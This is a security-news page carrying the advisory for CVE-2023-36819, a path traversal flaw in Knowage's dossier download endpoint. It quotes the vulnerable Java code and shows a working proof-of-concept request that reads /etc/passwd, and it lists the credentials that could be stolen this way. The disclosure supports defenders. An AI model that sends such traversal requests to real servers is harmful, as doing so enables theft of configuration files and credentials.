Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-36819: Path traversal in download functionalities

Knowage is the professional open source suite for modern business analytics over traditional sources and big data systems. The endpoint _/knowage/restful-services/dossier/importTemplateFile_ allows authenticated users to download template hosted on the server. However, starting in the 6.x.x branch and prior to version 8.1.8, the application does not sanitize the _templateName_parameter allowing an attacker to use *../* in it, and escaping the directory the template are normally placed and download any file from the system. This vulnerability allows a low privileged attacker to exfiltrate sensitive configuration file. This issue has been patched in Knowage version 8.1.8.

CVE
Open in Source
#vulnerability#mac#js#java#auth

Package

KnowageLabs / Knowage-Server (Knowage)

Affected versions

6.x.x, 7.x.x, 8.0.x, < 8.1.8

The endpoint /knowage/restful-services/dossier/importTemplateFile allows authenticated users to download template hosted on the server.

// knowage-core/src/main/java/it/eng/spagobi/api/DossierActivityResource.java @Path(“/resourcePath”) public Response getresourcePath(@QueryParam(“templateName”) String fileName) throws JSONException { // […] String outPath = SpagoBIUtilities.getResourcePath() + separator + “dossier” + separator + fileName; // […] File file = new File(outPath); // […] try { bytes = Files.readAllBytes(file.toPath()); responseBuilder = Response.ok(bytes);

However, the application does not sanitize the templateName parameter allowing an attacker to use "…/" in it, and escaping the directory the template are normally placed and download any file from the system.

In the following example Synacktiv experts were able to retrieve the /etc/passwd file from the server hosting the application.

GET /knowage/restful-services/dossier/resourcePath?templateName=../../../../../../etc/passwd HTTP/1.1
Host: knowage.local:8088
Cookie: JSESSIONID=8C072A9A51CBFBA80049298EC4757C6D

HTTP/1.1 200 
Date: Mon, 27 Jun 2022 17:34:21 GMT
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]

It’s important to note that this is not the only place a path traversal attack could be performed, however other vulnerable endpoints either require more privileges, or append other string to the controlled path provided by the attacker making the exploitation harder.

For example the following methods are also affected by this kind of vulnerability:

  • knowage-core/src/main/java/it/eng/spagobi/api/DataSetResource.java@cloneFile
  • knowage-core/src/main/java/it/eng/spagobi/engines/chart/service/GetPngAction.java

Impact

This vulnerability allows a low privileges attacker to exfiltrate sensitive configuration file such as:

  • Database credentials;
  • HMAC key in order to craft JWT token;
  • Tomcat credentials if the manager interface is enabled.

Patches

You need to upgrade to Knowage 8.1.8 or a later version.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE